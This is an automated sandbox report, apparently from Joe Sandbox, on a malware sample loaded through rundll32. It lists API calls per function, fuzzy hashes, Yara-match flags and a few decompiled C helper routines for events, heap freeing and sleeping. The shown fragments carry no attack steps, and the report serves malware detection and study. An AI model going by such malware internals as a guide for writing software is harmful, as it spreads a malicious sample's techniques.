                            • RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 04F68921
                            • lstrcpy.KERNEL32(00000000,?), ref: 04F6894A
                            • HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 04F6896B
                              • Part of subcall function 04F6DC41: SetEvent.KERNEL32(00000000,?,04F7507B), ref: 04F6DC56
                              • Part of subcall function 04F6DC41: WaitForSingleObject.KERNEL32(?,000000FF,?,?,04F7507B), ref: 04F6DC76
                              • Part of subcall function 04F6DC41: CloseHandle.KERNEL32(00000000,?,04F7507B), ref: 04F6DC7F
                              • Part of subcall function 04F6DC41: CloseHandle.KERNEL32(00000000,?,?,04F7507B), ref: 04F6DC89
                              • Part of subcall function 04F6DC41: RtlEnterCriticalSection.NTDLL(?), ref: 04F6DC91
                              • Part of subcall function 04F6DC41: RtlLeaveCriticalSection.NTDLL(?), ref: 04F6DCA9
                              • Part of subcall function 04F6DC41: CloseHandle.KERNEL32(00000000), ref: 04F6DCC5
                              • Part of subcall function 04F6DC41: LocalFree.KERNEL32(?), ref: 04F6DCD0
                              • Part of subcall function 04F6DC41: RtlDeleteCriticalSection.NTDLL(?), ref: 04F6DCDA
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseCriticalHandleSection$FreeHeap$AllocateDeleteEnterEventExchangeInterlockedLeaveLocalObjectSingleWaitlstrcpy
                            • String ID:
                            • API String ID: 1103286547-0
                            • Opcode ID: b8978369b299a9a26d8523a3ca6a3641b5ed28f0291bfdbd60202c8e0cdcf1f0
                            • Instruction ID: f9de8847682795afb8505cc00eabba1413bcd6c5b5c0317cd6a6d08b6a42f4e1
                            • Opcode Fuzzy Hash: b8978369b299a9a26d8523a3ca6a3641b5ed28f0291bfdbd60202c8e0cdcf1f0
                            • Instruction Fuzzy Hash: 7DF06235B4121AB7EA312E65BC09F663E28DB85B65F14001DF606AF180DA6DEC06D7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F74A4B Relevance: 6.0, APIs: 4, Instructions: 41filestringsynchronizationCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcatW.KERNEL32(?,?), ref: 04F74A5D
                              • Part of subcall function 04F6F39B: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000,?,?,00000000,00001000), ref: 04F6F3DB
                              • Part of subcall function 04F6F39B: GetLastError.KERNEL32 ref: 04F6F3E5
                              • Part of subcall function 04F6F39B: WaitForSingleObject.KERNEL32(000000C8), ref: 04F6F40A
                              • Part of subcall function 04F6F39B: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000), ref: 04F6F42D
                              • Part of subcall function 04F6F39B: SetFilePointer.KERNEL32(00001000,00000000,00000000,00000002), ref: 04F6F455
                              • Part of subcall function 04F6F39B: WriteFile.KERNEL32(00001000,00001388,?,?,00000000), ref: 04F6F46A
                              • Part of subcall function 04F6F39B: SetEndOfFile.KERNEL32(00001000), ref: 04F6F477
                              • Part of subcall function 04F6F39B: CloseHandle.KERNEL32(00001000), ref: 04F6F48F
                            • WaitForSingleObject.KERNEL32(00002710,?,00001000,?,00000005,?,04F6E4AF,?,?,00001000,?,?,00001000), ref: 04F74A80
                            • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,04F6E4AF,?,?,00001000,?,?,00001000), ref: 04F74AA2
                            • GetLastError.KERNEL32(?,04F6E4AF,?,?,00001000,?,?,00001000), ref: 04F74AB6
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$Create$ErrorLastObjectSingleWait$CloseHandlePointerWritelstrcat
                            • String ID:
                            • API String ID: 3370347312-0
                            • Opcode ID: c04df3f6f66191df81fec793dc285e9c92f1e5ed6eceeb32a739c021d86fb879
                            • Instruction ID: 5fb8d34b509794358e217a3bff5216f34477306787912c503411db4574d80ce1
                            • Opcode Fuzzy Hash: c04df3f6f66191df81fec793dc285e9c92f1e5ed6eceeb32a739c021d86fb879
                            • Instruction Fuzzy Hash: C5F06231244609FBEB119F60BC0AF6A3B65EF05710F100119FA03ED1D0E779A962DBAA
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F7D5F3 Relevance: 6.0, APIs: 4, Instructions: 40COMMON
                            Download Yara Rule
                            APIs
                            • memset.NTDLL ref: 04F7D601
                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,04F6DB8C,00000000,00000000,00000000,00000000,?,00000008,?,00000000,00000000), ref: 04F7D616
                            • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,04F63EC6,?,?), ref: 04F7D623
                            • CloseHandle.KERNEL32(?,?,?,?,04F63EC6,?,?), ref: 04F7D635
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateEvent$CloseHandlememset
                            • String ID:
                            • API String ID: 2812548120-0
                            • Opcode ID: 387de522f7f79d6fa5d27c77ff4cd9edcca3d451b776d0f9e6b6000954887fae
                            • Instruction ID: af68e72ed6d3e5146e1a8e3de1b67a76bd4d15e91942d77d56945ca22dc7d574
                            • Opcode Fuzzy Hash: 387de522f7f79d6fa5d27c77ff4cd9edcca3d451b776d0f9e6b6000954887fae
                            • Instruction Fuzzy Hash: 37F0FEB550431C7FD3206F66DCC4C27BBECFF56298B11492EF14686511D679A8068A60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04A1227F Relevance: 6.0, APIs: 4, Instructions: 40COMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E04A1227F(void* __esi) {
				struct _SECURITY_ATTRIBUTES* _v4;
				void* _t8;
				void* _t10;

				_v4 = 0;
				memset(__esi, 0, 0x38);
				_t8 = CreateEventA(0, 1, 0, 0);
				 *(__esi + 0x1c) = _t8;
				if(_t8 != 0) {
					_t10 = CreateEventA(0, 1, 1, 0);
					 *(__esi + 0x20) = _t10;
					if(_t10 == 0) {
						CloseHandle( *(__esi + 0x1c));
					} else {
						_v4 = 1;
					}
				}
				return _v4;
			}






                            0x04a12289
                            0x04a1228d
                            0x04a122a2
                            0x04a122a4
                            0x04a122a9
                            0x04a122af
                            0x04a122b1
                            0x04a122b6
                            0x04a122c1
                            0x04a122b8
                            0x04a122b8
                            0x04a122b8
                            0x04a122b6
                            0x04a122cf

                            APIs
                            • memset.NTDLL ref: 04A1228D
                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,761F81D0,00000000,00000000), ref: 04A122A2
                            • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 04A122AF
                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,04A1593D,00000000,?), ref: 04A122C1
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: CreateEvent$CloseHandlememset
                            • String ID:
                            • API String ID: 2812548120-0
                            • Opcode ID: 37cf58db3abf8d20e1889a897ca2db331d69e2603272d48d2150acc7dc62ffae
                            • Instruction ID: 554da26ab4ce3040544b57373febe3036bb3ea3f0d2c5769094fa0681f41b285
                            • Opcode Fuzzy Hash: 37cf58db3abf8d20e1889a897ca2db331d69e2603272d48d2150acc7dc62ffae
                            • Instruction Fuzzy Hash: 87F054F15043087FD3105F61DCC4C2BBBACEB91198B114D6DF14292121D675F8158A70
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F74AC4 Relevance: 6.0, APIs: 4, Instructions: 39filesynchronizationpipeCOMMON
                            Download Yara Rule
                            APIs
                            • CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001,0000003A,04F64BD6,000000FF,0631B7F0,?,?,04F7B7F2,0000003A,0631B7F0), ref: 04F74AE0
                            • GetLastError.KERNEL32(?,?,04F7B7F2,0000003A,0631B7F0,?,04F7A2EB,00000001,?,00000000,00000000,00000000,?,04F6109E,04F89F2C,00000008), ref: 04F74AEB
                            • WaitNamedPipeA.KERNEL32(00002710), ref: 04F74B0D
                            • WaitForSingleObject.KERNEL32(00000000,?,?,04F7B7F2,0000003A,0631B7F0,?,04F7A2EB,00000001,?,00000000,00000000,00000000,?,04F6109E,04F89F2C), ref: 04F74B1B
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Wait$CreateErrorFileLastNamedObjectPipeSingle
                            • String ID:
                            • API String ID: 4211439915-0
                            • Opcode ID: f2caa39c6f251700ca3579eaaa9bb3850081e2fa88e91c982ca620ca1a798794
                            • Instruction ID: 47b87d1c31939ef78ab97f3db2af8b5335bf26a5eade52981207e10d6f07d4cd
                            • Opcode Fuzzy Hash: f2caa39c6f251700ca3579eaaa9bb3850081e2fa88e91c982ca620ca1a798794
                            • Instruction Fuzzy Hash: E3F06D32E01529BBE2201E69BC4CF6A7E65EF01365F11562AFA19AA190D2282C41DB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F80DDD Relevance: 6.0, APIs: 4, Instructions: 38memorystringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlen.KERNEL32(?,?,00000000,04F67BEE), ref: 04F80DE2
                            • RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 04F80DF7
                            • wsprintfA.USER32 ref: 04F80E13
                              • Part of subcall function 04F7C01F: memset.NTDLL ref: 04F7C034
                              • Part of subcall function 04F7C01F: lstrlenW.KERNEL32(00000000,00000000,00000000,774CDBB0,00000020,00000000), ref: 04F7C06D
                              • Part of subcall function 04F7C01F: wcstombs.NTDLL ref: 04F7C077
                              • Part of subcall function 04F7C01F: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,774CDBB0,00000020,00000000), ref: 04F7C0A8
                              • Part of subcall function 04F7C01F: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,04F6A645), ref: 04F7C0D4
                              • Part of subcall function 04F7C01F: TerminateProcess.KERNEL32(?,000003E5), ref: 04F7C0EA
                              • Part of subcall function 04F7C01F: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,04F6A645), ref: 04F7C0FE
                              • Part of subcall function 04F7C01F: CloseHandle.KERNEL32(?), ref: 04F7C131
                              • Part of subcall function 04F7C01F: CloseHandle.KERNEL32(?), ref: 04F7C136
                            • HeapFree.KERNEL32(00000000,00000000,00000000,000000FF), ref: 04F80E2F
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseHandleHeapMultipleObjectsProcessWaitlstrlen$AllocateCreateFreeTerminatememsetwcstombswsprintf
                            • String ID:
                            • API String ID: 1624158581-0
                            • Opcode ID: 0917e2adac5b72fe2ee21dd89701e1fe72a14fff98cde51fc8236f3e56cbcde6
                            • Instruction ID: a155bbb01c99ed666ccf5fffef80d9ce2bd16929b1a8fb4406219b7bd8a6dfde
                            • Opcode Fuzzy Hash: 0917e2adac5b72fe2ee21dd89701e1fe72a14fff98cde51fc8236f3e56cbcde6
                            • Instruction Fuzzy Hash: E3F05432A01115BBD6211A19BC08F7B7BACDBC1B25F160119FA05EE291DA689C0A96A4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F66537 Relevance: 6.0, APIs: 4, Instructions: 30sleepmemoryCOMMON
                            Download Yara Rule
                            APIs
                            • RtlEnterCriticalSection.NTDLL(0631C2D0), ref: 04F66540
                            • Sleep.KERNEL32(0000000A), ref: 04F6654A
                            • HeapFree.KERNEL32(00000000,?), ref: 04F66572
                            • RtlLeaveCriticalSection.NTDLL(0631C2D0), ref: 04F66590
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                            • String ID:
                            • API String ID: 58946197-0
                            • Opcode ID: 097752c473314839b3c7d4bf48af9479d86668b1fca49c9ebe5c896750290cda
                            • Instruction ID: ce5a64293b6e4f8e151f2250c122bacbf4da399d986fbd75942018de2db5df03
                            • Opcode Fuzzy Hash: 097752c473314839b3c7d4bf48af9479d86668b1fca49c9ebe5c896750290cda
                            • Instruction Fuzzy Hash: D5F03470A00246AFE7209F28FC4AF2A3BA5EF10304F00841EB506EE291D638FC41DB66
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04A17607 Relevance: 6.0, APIs: 4, Instructions: 29memoryCOMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E04A17607() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0x4a1a30c; // 0x2c0
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0x4a1a35c; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0x4a1a30c; // 0x2c0
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0x4a1a2d8; // 0x5140000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
			}








                            0x04a17607
                            0x04a1760e
                            0x04a17658
                            0x04a1765a
                            0x04a1765a
                            0x04a17612
                            0x04a17618
                            0x04a1761d
                            0x04a17621
                            0x04a17627
                            0x04a1762e
                            0x00000000
                            0x00000000
                            0x04a17630
                            0x04a17635
                            0x00000000
                            0x00000000
                            0x00000000
                            0x04a17635
                            0x04a17637
                            0x04a1763f
                            0x04a17642
                            0x04a17642
                            0x04a17648
                            0x04a1764f
                            0x04a17652
                            0x04a17652
                            0x00000000

                            APIs
                            • SetEvent.KERNEL32(000002C0,00000001,04A15E70), ref: 04A17612
                            • SleepEx.KERNEL32(00000064,00000001), ref: 04A17621
                            • CloseHandle.KERNEL32(000002C0), ref: 04A17642
                            • HeapDestroy.KERNEL32(05140000), ref: 04A17652
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: CloseDestroyEventHandleHeapSleep
                            • String ID:
                            • API String ID: 4109453060-0
                            • Opcode ID: 3feb16a9669f38d52168275591468342f2849654bf6f6afa1fc71579179edd25
                            • Instruction ID: a950b5cf60de1d1d3213d11b779a296fbaf3f7ff4d1ee67f97f1d897fe895a6c
                            • Opcode Fuzzy Hash: 3feb16a9669f38d52168275591468342f2849654bf6f6afa1fc71579179edd25
                            • Instruction Fuzzy Hash: 92F065BDB4231297EB106B39994CB9337DCEB347A1B051510BD25D72B0DB28EC45D560
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F80B2C Relevance: 6.0, APIs: 4, Instructions: 28sleepmemoryCOMMON
                            Download Yara Rule
                            APIs
                            • RtlEnterCriticalSection.NTDLL(0631C2D0), ref: 04F80B35
                            • Sleep.KERNEL32(0000000A), ref: 04F80B3F
                            • HeapFree.KERNEL32(00000000), ref: 04F80B6D
                            • RtlLeaveCriticalSection.NTDLL(0631C2D0), ref: 04F80B82
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                            • String ID:
                            • API String ID: 58946197-0
                            • Opcode ID: 8cf41a27fd562c95f9a50ecec676e79a1d7fb175a5c0585808075d357b403603
                            • Instruction ID: a02deca0fa6f25415ee3534e3de5aa55d3b008c69bc176094e5568e96924c834
                            • Opcode Fuzzy Hash: 8cf41a27fd562c95f9a50ecec676e79a1d7fb175a5c0585808075d357b403603
                            • Instruction Fuzzy Hash: 6DF03474A4064AAFE7089F14F84AF3937A0EF40304B01400DE802DF250EB3CFC06DA21
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04A172C7 Relevance: 6.0, APIs: 4, Instructions: 28sleepmemoryCOMMON
                            Download Yara Rule
                            C-Code - Quality: 37%
                            			E04A172C7() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0x4a1a3cc; // 0x55395b0
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0x4a1a3cc; // 0x55395b0
					_t1 =  &(_t5[0x16]); // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0x4a1a3cc; // 0x55395b0
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0x4a1b827) {
					HeapFree( *0x4a1a2d8, 0, _t10);
					_t7 =  *0x4a1a3cc; // 0x55395b0
				}
				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}









                            0x04a172c7
                            0x04a172d0
                            0x04a172e0
                            0x04a172e0
                            0x04a172e5
                            0x04a172ea
                            0x00000000
                            0x00000000
                            0x04a172da
                            0x04a172da
                            0x04a172ec
                            0x04a172f1
                            0x04a172f5
                            0x04a17308
                            0x04a1730e
                            0x04a1730e
                            0x04a17317
                            0x04a17319
                            0x04a1731d
                            0x04a17323

                            APIs
                            • RtlEnterCriticalSection.NTDLL(05539570), ref: 04A172D0
                            • Sleep.KERNEL32(0000000A), ref: 04A172DA
                            • HeapFree.KERNEL32(00000000), ref: 04A17308
                            • RtlLeaveCriticalSection.NTDLL(05539570), ref: 04A1731D
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                            • String ID:
                            • API String ID: 58946197-0
                            • Opcode ID: 30b29fd7abb2937a76b4d805b95ced36bc2dd8c489273b00b637cf5cfd0b298e
                            • Instruction ID: 20a45d46eca605875443ca4b37f5d9f8873e91c4d03872c2e86b8c12feb5a1e3
                            • Opcode Fuzzy Hash: 30b29fd7abb2937a76b4d805b95ced36bc2dd8c489273b00b637cf5cfd0b298e
                            • Instruction Fuzzy Hash: C2F0D4B86012019BE7189B54E859B6A37B9EB64740B055019F902DB2B0C738FC02EA25
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F70901 Relevance: 5.2, APIs: 4, Instructions: 171memoryCOMMON
                            Download Yara Rule
                            APIs
                            • memset.NTDLL ref: 04F7095D
                            • CloseHandle.KERNEL32(?,?,00000100,?,00000000,?,04F6C1F8,00000000), ref: 04F709AB
                            • HeapFree.KERNEL32(00000000,00000000,00000000,00000094,00000000,04F81616,00000000,04F6C1F8,04F7E6A0,00000000,04F6C1F8,04F700C3,00000000,04F6C1F8,04F6306D,00000000), ref: 04F70CB6
                            • GetLastError.KERNEL32(?,00000000,?), ref: 04F70FB8
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseErrorFreeHandleHeapLastmemset
                            • String ID:
                            • API String ID: 2333114656-0
                            • Opcode ID: 1ef950f9789e9e0524a48de231ad5b4243d0d57bc6950c5fbc6b3efb60e4045e
                            • Instruction ID: d517e821d6976c176dfe727139df62cb51588d7b4a6390732664d1ed01e8c70c
                            • Opcode Fuzzy Hash: 1ef950f9789e9e0524a48de231ad5b4243d0d57bc6950c5fbc6b3efb60e4045e
                            • Instruction Fuzzy Hash: B5519632744219FEEB117E74EC41FEB3668EF45354F108067F905A6180EEBCB953AA62
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F6A78E Relevance: 5.1, APIs: 4, Instructions: 83memoryCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 04F763D1: lstrlenW.KERNEL32(?,00000000,?,?,00000001,00000001,?,04F6A7C4,?,?,?,?), ref: 04F763F5
                              • Part of subcall function 04F763D1: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 04F76407
                              • Part of subcall function 04F763D1: wcstombs.NTDLL ref: 04F76415
                              • Part of subcall function 04F763D1: lstrlen.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,00000001,00000001,?,04F6A7C4,?,?,?), ref: 04F76439
                              • Part of subcall function 04F763D1: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 04F7644E
                              • Part of subcall function 04F763D1: mbstowcs.NTDLL ref: 04F7645B
                              • Part of subcall function 04F763D1: HeapFree.KERNEL32(00000000,00000000,?,?,00000001,00000001,?,04F6A7C4,?,?,?,?,?), ref: 04F7646D
                              • Part of subcall function 04F763D1: HeapFree.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000001,00000001,?,04F6A7C4,?,?,?,?,?), ref: 04F76487
                            • GetLastError.KERNEL32 ref: 04F6A82D
                              • Part of subcall function 04F73BAA: HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,?,00004000,00000001,00000001,00000000,00000000,00000000,00000000,?,?,00000000), ref: 04F73C58
                              • Part of subcall function 04F73BAA: HeapFree.KERNEL32(00000000,?,00000000,?,00000000,?,00004000,00000001,00000001,00000000,00000000,00000000,00000000,?,?,00000000), ref: 04F73C7C
                              • Part of subcall function 04F73BAA: HeapFree.KERNEL32(00000000,00000000,?,00000000,00000000,?,?,04F617D6,?,?,?,?,?,?,?), ref: 04F73C8A
                            • HeapFree.KERNEL32(00000000,?), ref: 04F6A849
                            • HeapFree.KERNEL32(00000000,?), ref: 04F6A85A
                            • SetLastError.KERNEL32(00000000), ref: 04F6A85D
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$Free$AllocateErrorLastlstrlen$mbstowcswcstombs
                            • String ID:
                            • API String ID: 3867366388-0
                            • Opcode ID: b7a9d967e9a33bed0f14cf56146396fd51a85f5ab6bcbe4d0689db0154cc3890
                            • Instruction ID: dcd89fb8a32c0d8dcd0a6542bb64e74b0b2c432cabea38fc14b2521761550b79
                            • Opcode Fuzzy Hash: b7a9d967e9a33bed0f14cf56146396fd51a85f5ab6bcbe4d0689db0154cc3890
                            • Instruction Fuzzy Hash: 53312C31D00108FFCF029FA9DC4489EBFB5FF49714B10415AF926A6121D7759A52EF90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F6174F Relevance: 5.1, APIs: 4, Instructions: 83memoryCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 04F7D698: lstrlen.KERNEL32(00000000,?,?,00000000,?,?,00000001,00000001,?,04F61785,?,?,?,?,?), ref: 04F7D6F2
                              • Part of subcall function 04F7D698: lstrlen.KERNEL32(?,?,?,00000000,?,?,00000001,00000001,?,04F61785,?,?,?,?,?), ref: 04F7D710
                              • Part of subcall function 04F7D698: RtlAllocateHeap.NTDLL(00000000,761B6985,?), ref: 04F7D73C
                              • Part of subcall function 04F7D698: memcpy.NTDLL(00000000,00000000,00000000,?,?,00000001,00000001,?,04F61785,?,?,?,?,?), ref: 04F7D753
                              • Part of subcall function 04F7D698: HeapFree.KERNEL32(00000000,00000000), ref: 04F7D766
                              • Part of subcall function 04F7D698: memcpy.NTDLL(00000000,?,?,?,?,00000001,00000001,?,04F61785,?,?,?,?,?), ref: 04F7D775
                            • GetLastError.KERNEL32 ref: 04F617EE
                              • Part of subcall function 04F73BAA: HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,?,00004000,00000001,00000001,00000000,00000000,00000000,00000000,?,?,00000000), ref: 04F73C58
                              • Part of subcall function 04F73BAA: HeapFree.KERNEL32(00000000,?,00000000,?,00000000,?,00004000,00000001,00000001,00000000,00000000,00000000,00000000,?,?,00000000), ref: 04F73C7C
                              • Part of subcall function 04F73BAA: HeapFree.KERNEL32(00000000,00000000,?,00000000,00000000,?,?,04F617D6,?,?,?,?,?,?,?), ref: 04F73C8A
                            • HeapFree.KERNEL32(00000000,?), ref: 04F6180A
                            • HeapFree.KERNEL32(00000000,?), ref: 04F6181B
                            • SetLastError.KERNEL32(00000000), ref: 04F6181E
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$Free$ErrorLastlstrlenmemcpy$Allocate
                            • String ID:
                            • API String ID: 2451549186-0
                            • Opcode ID: b54013889cf22dcb9081b3669b98c6c302880eebc922ca90d1ed05f2af8cdb12
                            • Instruction ID: 32cf48a19edc0abbeb26ded4ca74ac137c090b4609d5f68bd2be6f4cf7240b48
                            • Opcode Fuzzy Hash: b54013889cf22dcb9081b3669b98c6c302880eebc922ca90d1ed05f2af8cdb12
                            • Instruction Fuzzy Hash: C9311832D00108BFCF129FA9DD40CAEBFB5FF48724B10415AF916A6121D735AA62EF90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F66FC7 Relevance: 5.1, APIs: 4, Instructions: 76COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: memset
                            • String ID:
                            • API String ID: 2221118986-0
                            • Opcode ID: 0c9a7a53eee5391e6b6a3e98c6eed160d4185ad33920cff06194bfe443eb68e7
                            • Instruction ID: 439029550477c20c992535bd7bff7b56824b3f912104bec5247c4251a7a7c0c7
                            • Opcode Fuzzy Hash: 0c9a7a53eee5391e6b6a3e98c6eed160d4185ad33920cff06194bfe443eb68e7
                            • Instruction Fuzzy Hash: 9C2181B6901919BBDB216FA0DC84966BBA9FF093087140119E94786C50D732F4B3DFE1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F6D429 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlen.KERNEL32(00000000,00000008,00000000,00000000,?,?,04F7DD0F,00000000,00000000,00000004,00000000,?,04F6DBAC,?,?,00000000), ref: 04F6D435
                              • Part of subcall function 04F69394: RtlAllocateHeap.NTDLL(00000000,?,04F70051), ref: 04F693A0
